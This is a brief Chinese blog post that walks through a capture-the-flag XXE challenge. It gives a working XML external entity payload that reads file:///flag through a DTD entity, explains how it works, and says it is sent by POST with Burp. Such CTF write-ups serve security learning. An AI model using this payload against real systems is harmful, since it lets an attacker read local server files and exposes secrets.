xxe漏洞

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
<!ENTITY admin SYSTEM "file:///flag">
]>    这段是DTD文档类型定义
//<user>

  <username>

    &admin;

  </username>

  <password>

    123456

  </password>

</user>  这里是题目给的格式

注意这里是使用file://协议读取flag文件,并且将这个文件赋给admin。后面的admin前有&的意思是读取admin。所以这里会读取flag文件。注意&admin后面要加 ;    因为是当作语句执行的。

 

用burp post方法传入以上代码

posted @   heartbeat111  阅读(27)  评论(0编辑  收藏  举报
相关博文:
· 文件下载漏洞相关
· 文件包含(本地文件+远程文件)
· 浅谈XXE漏洞
· 【XXE漏洞】原理及实践演示
· day4下午
阅读排行:
· DeepSeek 开源周回顾「GitHub 热点速览」
· 物流快递公司核心技术能力-地址解析分单基础技术分享
· .NET 10首个预览版发布:重大改进与新特性概览!
· AI与.NET技术实操系列(二):开始使用ML.NET
· 单线程的Redis速度为什么快?
点击右上角即可分享
微信分享提示
AI FOR CODE 大赛